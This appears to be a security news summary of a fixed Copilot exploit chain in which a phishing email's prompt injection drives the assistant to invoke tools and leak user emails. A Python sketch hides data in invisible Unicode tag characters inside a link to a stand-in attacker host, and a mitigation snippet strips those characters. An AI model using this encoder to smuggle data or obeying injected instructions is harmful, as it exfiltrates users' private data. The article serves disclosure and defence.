From Copilot to Copirate: How data thieves could hijack Microsoft’s chatbot

August 28, 2024 at 09:08AM

Microsoft has fixed flaws in Copilot that allowed attackers to steal users’ emails and other personal data. Red teamer Johann Rehberger disclosed the exploit chain, prompting Microsoft to make changes to protect customers. The chain combined prompt injection, automatic tool invocation, and ASCII smuggling to exfiltrate data, underscoring the ongoing challenge of defending LLM-based assistants against LLM-specific attack classes.
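
The ASCII smuggling step is the most unusual link in that chain. As publicly documented by Rehberger, the technique shifts ordinary ASCII characters into the Unicode Tags block (U+E0000–U+E007F), which most UIs render as nothing visible but which an LLM can still emit, so stolen data can ride invisibly inside an otherwise innocuous hyperlink. Below is a minimal Python sketch of that encoding; the attacker URL is purely hypothetical.

```python
# Sketch of the "ASCII smuggling" step, assuming the publicly
# documented technique: each printable ASCII character is shifted
# into the invisible Unicode Tags block (U+E0000-U+E007F).

TAG_BASE = 0xE0000

def smuggle(payload: str) -> str:
    """Encode ASCII text as invisible Unicode tag characters."""
    return "".join(chr(TAG_BASE + ord(c)) for c in payload if ord(c) < 0x80)

def unsmuggle(hidden: str) -> str:
    """Recover the hidden ASCII from tag characters."""
    return "".join(
        chr(ord(c) - TAG_BASE)
        for c in hidden
        if TAG_BASE <= ord(c) <= TAG_BASE + 0x7F
    )

# The encoded string renders as nothing in most UIs but survives
# inside a URL, which is what made a clickable link a viable
# exfiltration channel. The domain below is purely illustrative.
secret = smuggle("user@example.com")
link = f"https://attacker.example/collect?d={secret}"
assert unsmuggle(secret) == "user@example.com"
```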

The article walks through the attack chain in more detail: a phishing email carries a prompt-injection payload, and carefully crafted inputs then manipulate Copilot into invoking tools and exfiltrating data. It also covers other potential malicious uses of Copilot, including spear phishing and accessing sensitive data without leaving a trace. The episode underscores the importance of safeguarding language model systems against evolving attack techniques to preserve data privacy and security.
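
Microsoft has not published the details of its fix, but one plausible mitigation for this particular exfiltration channel is to strip and flag Tags-block characters before model output is rendered or a link is followed. The sketch below is an assumption along those lines, not Microsoft’s confirmed fix; the function name and placement are illustrative.

```python
# A plausible mitigation, not Microsoft's confirmed fix: strip and
# flag Tags-block characters before model output is rendered or a
# link is followed. Function name and placement are assumptions.

def strip_smuggled_text(text: str) -> tuple[str, bool]:
    """Return text with Tags-block chars removed, plus a flag that
    is True when any were present (a likely smuggling attempt)."""
    cleaned = "".join(c for c in text if not 0xE0000 <= ord(c) <= 0xE007F)
    return cleaned, cleaned != text

safe, suspicious = strip_smuggled_text("click here\U000E0041\U000E0042")
assert safe == "click here" and suspicious is True
```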
